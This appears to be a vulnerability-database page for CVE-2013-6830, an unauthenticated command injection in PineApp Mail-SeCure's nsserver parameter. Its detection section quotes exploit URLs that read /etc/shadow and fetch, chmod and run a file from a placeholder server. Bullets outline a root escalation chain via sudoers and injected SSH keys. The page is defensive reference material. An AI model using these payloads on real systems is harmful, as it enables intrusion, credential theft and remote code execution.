CVE-2013-6830
published 2013-11-20CVE-2013-6830: admin/confnetworking.html in PineApp Mail-SeCure 3.70 and earlier on 5099SK and earlier platforms allows remote attackers to execute arbitrary commands via…
PriorityP263high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
8.93%
94.6th percentile
admin/confnetworking.html in PineApp Mail-SeCure 3.70 and earlier on 5099SK and earlier platforms allows remote attackers to execute arbitrary commands via shell metacharacters in the nsserver parameter during an nslookup operation.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pineapp | mail-secure_5099sk | <= - | — |
Detection & IOCsextracted from sources · hover to see the quote
urlhttps://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;%20cat%20/etc/shadow↗
urlhttps://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;wget%20http://server.com/somefile%20-O%20/tmp/somefile↗
commandcmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;wget%20http://server.com/somefile%20-O%20/tmp/somefile;chmod%20+x%20somefile;/tmp/somefile↗
- →Detect unauthenticated GET requests to /admin/confnetworking.html containing shell metacharacters (semicolons) in the 'nsserver' query parameter, indicative of command injection attempts. ↗
- →Monitor HTTP/HTTPS traffic on port 7443 for requests to /admin/confnetworking.html with query parameters cmd=nslookup and nsserver values containing ';', '%3B', or other shell metacharacters. ↗
- →Alert on creation or modification of /tmp/rc.firewall, which is abused for privilege escalation to root via a weak sudoers configuration on PineApp Mail-SeCure appliances. ↗
- →Detect outbound wget or curl requests originating from the PineApp appliance process context (qmailq user), which may indicate payload download following initial command injection. ↗
- →Monitor SSH connections on non-standard port 7022 to the appliance, especially from external sources, as the exploit chain culminates in root SSH access via injected authorized_keys. ↗
- →Alert on writes to /root/.ssh/authorized_keys on the appliance, as the exploit injects an attacker-controlled SSH public key to establish persistent root access. ↗
- ·The exploit requires no authentication; the vulnerable endpoint /admin/confnetworking.html is accessible without credentials, making network-level access control the primary mitigation. ↗
- ·Privilege escalation to root depends on a weak sudoers configuration specific to the appliance; not all deployments may be equally vulnerable to the full root escalation chain. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
2013-11-20
Published